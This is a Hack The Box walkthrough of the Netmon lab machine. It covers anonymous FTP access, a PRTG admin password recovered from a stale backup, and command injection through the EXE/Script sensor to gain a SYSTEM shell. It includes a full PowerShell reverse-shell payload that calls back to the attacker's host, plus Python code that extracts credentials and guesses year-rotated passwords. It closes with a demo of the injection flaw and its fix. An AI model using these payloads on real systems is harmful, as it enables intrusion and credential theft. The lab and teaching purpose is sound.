Netmon - Hack The Box

Resolution of the Netmon machine

May 19, 2020 - 5 minute read
HackTheBox

Netmon banner

Netmon is an easy Windows machine with two interesting services: an FTP server that allows anonymous login and exposes the whole system drive, and a vulnerable web application, PRTG Network Monitor, which monitors the network.

Recon

Starting with Nmap:

# Nmap 7.70 scan initiated Fri Jan 17 11:02:18 2020 as: nmap -sV -sC -oA netmon -T4 -Pn 10.10.10.152
Nmap scan report for 10.10.10.152
Host is up (0.22s latency).
Not shown: 995 closed ports
PORT    STATE SERVICE      VERSION
21/tcp  open  ftp          Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 02-02-19  11:18PM                 1024 .rnd
| 02-25-19  09:15PM       <DIR>          inetpub
| 07-16-16  08:18AM       <DIR>          PerfLogs
| 02-25-19  09:56PM       <DIR>          Program Files
| 02-02-19  11:28PM       <DIR>          Program Files (x86)
| 02-03-19  07:08AM       <DIR>          Users
|_02-25-19  10:49PM       <DIR>          Windows
| ftp-syst: 
|_  SYST: Windows_NT
80/tcp  open  http         Indy httpd 18.1.37.13946 (Paessler PRTG bandwidth monitor)
|_http-server-header: PRTG/18.1.37.13946
| http-title: Welcome | PRTG Network Monitor (NETMON)
|_Requested resource was /index.htm
|_http-trane-info: Problem with XML parsing of /evox/about
135/tcp open  msrpc        Microsoft Windows RPC
139/tcp open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp open  microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 1m38s, deviation: 0s, median: 1m37s
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2020-01-17 11:04:21
|_  start_date: 2020-01-17 10:51:53

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Jan 17 11:02:49 2020 -- 1 IP address (1 host up) scanned in 31.34 seconds

What catches our attention is port 21: the FTP server allows anonymous login and its root is the entire Windows system drive, so we can browse C:\ directly and download anything the FTP service account can read.

Netmon Recon

Now we can capture the user flag easily through the FTP:

Netmon Recon

The next step is the web application, PRTG Network Monitor. Searching for known issues with this version turns up an advisory from Paessler, the PRTG vendor, stating that PRTG configuration backups can contain credentials in plain text (quoted below):

PRTG exposes Domain accounts and passwords in plain text.

All copies generated by a PRTG Network Monitor version 17.4.35.3326 or later can be affected.

What's next?

We recommend that you delete all affected copies of the PRTG Configuration.dat file:

- Automatically generated backups under: C:\ProgramData\Paessler\PRTG Network Monitor\Configuration Auto-Backups\
- Automatically generated temporary files that may exist:
  - C:\ProgramData\Paessler\PRTG Network Monitor\PRTG Configuration.old
  - C:\ProgramData\Paessler\PRTG Network Monitor\PRTG Configuration.nul

Since we already have anonymous FTP access to the system drive, we can look for those files ourselves. After some browsing we find an old backup named PRTG Configuration.old.bak under /Users/All Users/Paessler/PRTG Network Monitor (C:\Users\All Users is a junction to C:\ProgramData, so this is the PRTG data directory from the advisory).

Searching inside that file we find a string that looks like a credential:

Netmon Recon

Exploiting - Exploiting a vulnerability on PRTG device sensors

Now that we have what look like the PRTG web application credentials, let's try them on the login page:

Netmon Exploiting

The login fails with the password exactly as it appears in the backup. The password ends in a year and the backup is stale, so the administrator may simply have rotated it: changing PrTg@dmin2018 to PrTg@dmin2019 works!

Netmon Exploiting
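As an added example (my own code, not part of the original post and not PRTG's), here is a small Python helper that does what the search through the backup above does by hand and also automates the year-bump guess that got us in. The sample configuration is constructed to mirror the layout of the <dbpassword> block found in PRTG Configuration.old.bak; it is not the real file, and the second credential in it is made up.

```python
import re

# Constructed sample modelled on the <dbpassword> layout in the backup found
# on the box; the second entry is invented to show that several hits are handled.
SAMPLE_CONFIG = """<?xml version="1.0" encoding="UTF-8"?>
<data>
  <login>prtgadmin</login>
  <dbpassword>
    <!-- User: prtgadmin -->
    PrTg@dmin2018
  </dbpassword>
  <dbcredentials>
    <!-- User: backupuser -->
    Winter2017!
  </dbcredentials>
</data>
"""

# Matches a credential element, optionally preceded by the "<!-- User: x -->"
# comment that sits next to the password.  A regex is used on purpose: the
# comment is what ties the password to a username, and an XML parser would
# drop comments by default.
_CRED_RE = re.compile(
    r"<(dbpassword|dbcredentials)>\s*"
    r"(?:<!--\s*User:\s*(?P<user>[^\s>]+)\s*-->)?\s*"
    r"(?P<pw>[^<\s][^<]*?)\s*</\1>",
    re.S,
)


def extract_credentials(config_text):
    """Return (username, password) pairs found in a PRTG configuration dump.

    username is None when no "User:" comment accompanies the password.
    """
    return [(m.group("user"), m.group("pw")) for m in _CRED_RE.finditer(config_text)]


def year_candidates(password, years_ahead=2):
    """Guess rotated versions of a password that contains a four-digit year.

    The backup we recovered was stale and the working password was the same
    string with the year bumped; this generates that family of guesses.
    """
    years = list(re.finditer(r"(?:19|20)\d{2}", password))
    if not years:
        return []
    last = years[-1]          # rotate the last year in the string
    base = int(last.group())
    return [
        password[: last.start()] + str(base + i) + password[last.end():]
        for i in range(1, years_ahead + 1)
    ]


if __name__ == "__main__":
    for user, pw in extract_credentials(SAMPLE_CONFIG):
        print(f"{user or '<unknown>'}: {pw}  -> also try {year_candidates(pw)}")
```

Run it against the downloaded backup instead of SAMPLE_CONFIG to get the credential list; the year candidates are cheap guesses worth trying before anything heavier, since a backup dated in a previous year is a strong hint that the password has been rotated on the same pattern.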

PRTG monitors a network by attaching sensors to devices, and sensors are added from the web UI as modules. One of them, the EXE/Script sensor, runs a script on the PRTG server and takes an operator-supplied parameter string that is appended to the script's command line without sanitisation, so shell syntax placed in that field is executed as well. To exploit this, open Devices, go to the GATEWAY section and click Add Sensor, or browse directly to http://10.10.10.152/addsensor.htm?id=2004.

Select Custom Sensors and then the EXE/Script sensor:

Netmon Exploiting

In the EXE/Script field select Demo Powershell Script - Available MB via WMI.ps1, and in the parameter field paste the reverse shell payload below (replace 10.10.14.XX with your own address). The leading semicolon ends the demo script's invocation so that everything after it runs as a new PowerShell statement:

;$client = New-Object System.Net.Sockets.TCPClient('10.10.14.XX',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

Netmon Exploiting

Save the new sensor, start a netcat listener on port 4444 (the port used in the payload), and then click Check Now on the sensor so that PRTG runs it immediately.

Shortly after, we get our reverse shell:

Netmon Exploiting
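To make clear why an operator-editable parameter field turns into code execution, here is an added example (my own illustration, not PRTG's code) of the root cause: a hypothetical sensor runner that builds a command line by string concatenation and hands it to a shell, next to one that passes the parameters as an argument vector. It models the behaviour on /bin/sh rather than PowerShell so that it runs anywhere; the ";" separator plays the same role as the leading ";" in the payload above. The sensor script and the payload are constructed for the demo.

```python
import os
import shlex
import subprocess
import tempfile

# Hypothetical stand-in for the sensor script (not PRTG's demo script):
# it only reports how many arguments it received.
SENSOR_SCRIPT = '#!/bin/sh\necho "sensor ran with $# argument(s)"\n'


def _with_script(func):
    """Write the stand-in script to a temp file, call func(path), clean up."""
    fd, path = tempfile.mkstemp(suffix=".sh")
    with os.fdopen(fd, "w") as f:
        f.write(SENSOR_SCRIPT)
    try:
        return func(path)
    finally:
        os.unlink(path)


def run_sensor_vulnerable(params):
    """Build 'sh <script> <params>' as one string and run it through a shell.

    Whatever the operator typed into the parameter field is re-parsed by the
    shell, so ';', '&&', '|' or '$(...)' in params start new commands.
    """
    def run(path):
        cmd = f"sh {shlex.quote(path)} {params}"   # params spliced in verbatim
        return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout
    return _with_script(run)


def run_sensor_hardened(params):
    """Split params into an argv list and execute without a shell.

    The same ';' is now just one of the script's arguments; nothing in the
    field can escape the intended program.
    """
    def run(path):
        argv = ["sh", path, *shlex.split(params)]
        return subprocess.run(argv, capture_output=True, text=True).stdout
    return _with_script(run)


# Constructed payload: the same trick as the PowerShell one-liner, in sh syntax.
INJECTION = "; echo INJECTED"

if __name__ == "__main__":
    print("vulnerable:", run_sensor_vulnerable(INJECTION))
    print("hardened:  ", run_sensor_hardened(INJECTION))
```

The vulnerable runner prints the script's line followed by INJECTED; the hardened one reports three arguments and never runs the injected command. The fix is not quoting or filtering the field but never letting a shell re-parse it, which is the same lesson for any product that lets a web user supply command-line parameters.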

Exploiting - Using a custom exploit

For knowledge purposes I made a custom exploit that exploits the PRTG Network Monitor vulnerability and spawns an interactive reverse shell for us; it's available on my GitHub :)

Netmon Exploit

Netmon Exploit

To our surprise, PRTG Network Monitor runs with SYSTEM privileges, so the shell already has full access to the machine and we can capture the root flag without any privilege escalation!

Netmon Exploiting